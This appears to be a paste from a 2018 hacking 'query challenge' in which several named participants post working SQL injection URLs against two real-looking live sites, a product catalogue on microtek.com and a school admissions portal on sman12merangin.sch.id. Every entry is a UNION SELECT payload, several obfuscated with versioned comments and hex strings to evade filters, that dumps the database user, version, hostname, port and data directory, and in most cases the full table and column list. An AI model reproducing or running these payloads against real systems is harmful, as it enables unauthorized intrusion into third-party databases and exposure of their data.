dedot

Query Chall

Jul 6th, 2018 (edited)
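  1. Good queries (UNION SELECT injection strings against the ID parameter, one per submitter; each reads user(), version() and database(), and some also read information_schema.columns)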
  2.  
  3. -------------------------------------------------------------------------------------------------------------------
  4. Query w : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) UNION SELECT 1,2,3,4,5,6,7,concat('Injected by Fansa<br>',user(),'<br>',@@version,'<br>',database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
  5.  
  6. Nikolas : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,'<br>',table_name,'::',column_name))))x)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
  7.  
  8. Bayu : http://www.microtek.com/products.php?KindID=6&ID=1+limit+2%2C1+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2Cconcat(%27</title>%27,0x496e6a6563746564206279204b686174756c697374697761,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),68,69,70--+
  9.  
  10. Diwan : http://www.microtek.com/products.php?KindID=6&ID=1+And x(point(9,9))+UNION+SELECT 1,2,3,4,5,6,concat(0x496e6a6563746564206279202e2f57616e7a5f4944,'</br>',user(),'</br>',database(),'</br>',version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
  11.  
  12. Rio : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,Concat('</title>','Injected By RHawkz404','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(SELECT GROUP_CONCAT(table_name,0x203a3a20,column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE())),68,69,70--
  13.  
  14. Revo : http://www.microtek.com/products.php?KindID=6&ID=1 =75=75 union select 1,2,3,4,5,6,CONCAT('Injected by R3V0',0x3c62723e,USER(),0x3c62723e,DATABASE(),0x3c62723e,VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
  15.  
  16. -----------------------------------------------------------------------------------------------------------------------
  17.  
  18. My QUERY
  19. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=-53%27+/*!50000UNION+*/ALL+/*!50000SELECT*/+1,/*!12345Concat*/(%27%3Cbr%3E%27,%27%3Cimg%20src=%22https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png%22%20height=%22200%22%20width=%22200%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Inject%20By%20Cipuyz%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Version%20::%20%27,version/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Database%20::%20%27,database/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Port%20::%20%27,@@port,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Hostname%20::%20%27,@@hostname,%27%3C/font%3E%27,%27%3Cbr%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),3,4--%20-
  20.  
  21. QUERY STERBEN
  22. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=-52%27+/*!union*/+/*!select*/1,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,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),concat+(@@hostname,0x3c62723e,@@port,0x3c62723e,@@version,0x3c62723e,0x3c62723e)--+
  23.  
  24. QUERY FANSA NO IMAGE BUT NO PROBLEM
  25. https://www.sman12merangin.sch.id/ppdb/index.php?page=informasi&cari=Sekolah%27%20and%201=1%20and%20false%20/*!50000Union*/%20Select%201,/*!50000Concat*/(%27%3Cbr%3EInjected%20by%20Fansa%3Cbr%3E%27,%27USER%20::%20%27,user/**x**/(),%27%3Cbr%3E%27,%27DATABASE%20::%20%27,database/**x**/(),%27%3Cbr%3E%27,%27HOSTNAME%20::%20%27,@@hostname,%27%3Cbr%3E%27,%27VERSION%20::%20%27,@@version,%27%3Cbr%3E%27,%27PORT%20::%20%27,@@port,%27%3Cbr%3E%27,%27DIR%20::%20%27,@@datadir,%27%3Cbr%3E%27,make_set(6,@:=%27%20%27,(select(1)/*!50000from*/(/*!50000information_schema*/.columns)where@:=make_set(511,@,%27%3Cli%3E%27,/*!50000table_name*/,/*!50000column_name*/)),@)),3,4--%20-
  26.  
  27. QUERY IMADE NO IMAGE BUT NO PROBLEM
  28. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=-52%27+/*!50000UNION*/+ALL+/*!50000SELECT*/+1,concat(0x696e6a656374204279204d722e204d207b696d617d,0x7c,@@version,0x7c,@@hostname,0x7c,@@port,0x7c,@@datadir,0x7c),export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
  29.  
  30. QUERY JAINUDIN
  31. https://www.sman12merangin.sch.id/ppdb/index.php?page=informasi&cari=1'%20and%20false%20/*!50000union*/%20/*!50000select*/%201,concat(@c:=0x00,0x3c696d67207372633d2268747470733a2f2f692e65626179696d672e636f6d2f696d616765732f672f7e4c5141414f53775a4b425a4b4145712f732d6c3430302e6a7067223e3c2f696d673e,0x3c62723e,0x696e6a6563742062792057314255,0x3c62723e,/*!50000database*/(),0x3c62723e,@@version,0x3c62723e,/*!50000user*/(),0x3c62723e,@@port,0x3c62723e,@@hostname,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c),3,4--+-
  32.  
  33. QUERY RAFLI PASYA
  34. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=.51%27/*!50000UnIoN*/%20/*!50000SeLeCt*/1111,Concat(%22JIHYO%20IS%20HERE%22,%22%3Cbr%3E%22,%22%3Cbr%3E%22,Version/**_**/(),%22%3Cbr%3E%22,Database/**_**/(),%22%3Cbr%3E%22,User/**_**/(),%22%3Cbr%3E%22,@@hostname,%22%3Cbr%3E%22,@@port,@C:=%22%3Cbr%3E%22,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,%22%3Cbr%3E%22,/*!12345table_name*/,/*!12345column_name*/)),@)),3333,4444--+